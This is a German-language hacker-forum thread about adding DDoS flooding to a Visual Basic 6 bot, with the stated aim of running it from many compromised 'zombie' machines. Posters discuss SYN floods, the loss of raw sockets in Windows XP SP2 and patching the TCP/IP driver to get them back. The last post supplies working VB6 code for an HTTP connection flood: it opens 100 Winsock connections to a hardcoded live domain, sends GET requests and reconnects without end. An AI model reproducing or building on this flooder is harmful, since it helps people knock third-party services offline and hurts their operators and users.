VB6 & DDoS - Wer weiß was?

[Jaro]

Moin,

bin vor paar Tagen beim Entmüllen meiner Festplatte wieder auf einen alten VB-Bot Source gestoßen und wollte ihn mal bisschen ausbauen. Allerdings finde ich kaum (brauchbares!) Material für VB zum Thema Bots/bzw. (D)DoS Oo.

Irgendwo hab ich aufgeschnappt, dass in VB DDoS (effektiv?) gar nicht möglich wäre, weil Synflood nur mit Raw Sockets zu machen wäre! Meines Wissens unterstützt Windows ab XP Service Pack 2 ja Raw Sockets überhaupt nicht mehr oder? <Ôô> Wie kommt es dann, dass es C++ Bots gibt, die Syn bzw. SuperSynFlood haben?!

Und wie schaut es mit anderen Flooding Methoden aus? ICMP? UDP?
Das einzige, was ich bis jetzt gefunden habe war der Open Source von Mini DoS und der ist nicht sehr ergiebig!^^

Mir ist schon bewusst, dass ein kleiner Visual Basic Bot nie mit großen Sachen wir Rx & Co. mithalten werden kann, aber trotzdem muss es doch möglich sein zumindest auf kleinerer Ebene umsetzbar sein? Oder ist hier tatsächlich die Grenze von VB Classic? ^^

[kInGoFcHaOs]

Irgendwo hab ich aufgeschnappt, dass in VB DDoS (effektiv?) gar nicht möglich wäre, weil Synflood nur mit Raw Sockets zu machen wäre!

Naja so ähnlich aber mit der ineffizentz hast du recht


ICMP flood dürfte möglich serin aber nur mit normalen packeten und das is langweilig ^^ und nicht so effektiv genauso mit UDP

[Hamtaro]

Also Raw Sockets kannst du wohl in der Tat vergessen, und damit auch die effektivsten Floodmöglichkeiten.
Obwohl immer noch das Gerücht von dem gepatchten Treiber die Runde macht, der die Raw Sockets wieder aktiviert.

[Jaro]

Gibt es denn gar keine Möglichkeit mehr Raw Sockets bzw. etwas ähnliches/analoges zu benutzen? Wie machen das denn C++ Bots?! Gibt ja kaum mehr Mods davon bzw. neue Bots, die kein (Super)Syn bzw. irgendwelche anderen, sehr effektiven Floodingmethoden haben!
Und Sockets sind ja nicht an eine Programmiersprache gebunden, das heißt wenn Syn auf XP unter C++ geht, muss es doch (zumindest theoretisch^^) auch in Visual Basic gehen, oder?

[Bozok]

Sie Patchen TCP/IP treiber und unlocken die Funktion. Natürlich geht das auch mit VB Oder du Packst den gepachten Treiber in deinen Server... Außerdem geht threading auf VB wodurch du auch mehrere DoS Instanzen öffnen kannst!

[Jaro]

Sie Patchen TCP/IP treiber und unlocken die Funktion. Natürlich geht das auch mit VB Oder du Packst den gepachten Treiber in deinen Server...

Hast du Material dazu bzw. einen guten Tipp, wo man was findet?

Außerdem geht threading auf VB wodurch du auch mehrere DoS Instanzen öffnen kannst!

Schon klar, aber bringt das effektiv was? Wenn man dann 10k Zombies für ein kleinen Host braucht rechnet sich das nicht! ^^

[AllesFAM]

Hm najo aber VB würde ja eig nicht gehen weil ja da keine Raw Sockets gibt und da der verbindungsaufbau ja schon fertig "vordefiniert" ist oder ?

[Sirect]

Zieh 3 mal Winsock auf ne Form und du hast sogar DDOS - 3 Angreifer xD

[Jaro]

Hm najo aber VB würde ja eig nicht gehen weil ja da keine Raw Sockets gibt und da der verbindungsaufbau ja schon fertig "vordefiniert" ist oder ?

Raw Sockets sind generell seit dem Service Pack 2 für Windows XP nicht mehr integriert, aber Slayer hats ja oben geschrieben, man kann den TCP/IP Treiber eventuell patchen...

Zieh 3 mal Winsock auf ne Form und du hast sogar DDOS - 3 Angreifer xD

Geniale Idee! ^^

[igoe*star]

Hier haste du einen vBulletin Flooder:

Code:

Option Explicit
Private Const Target$ = "www.google.de"
Private Const Connections& = 100

Private Sub Command1_Click()
    Dim i&
    For i = 1 To Connections
        Load WS(i)
        WS(i).Connect Target, 80
    Next i
End Sub

Private Sub WS_Close(Index As Integer)
    WS(Index).Close
    WS(Index).Connect Target, 80
End Sub

Private Sub WS_Connect(Index As Integer)
WS(Index).SendData "GET / HTTP/1.1" & vbCrLf & _
                   "Host: " & Target & vbCrLf & _
                   "Accept: */*" & vbCrLf & _
                   "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" & vbCrLf & vbCrLf
End Sub

Private Sub WS_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
    WS(Index).Close
    WS(Index).Connect Target, 80
End Sub

Muss sicherlich noch etwas umgebaut werden, aber die Grundlage ist da.

igoe.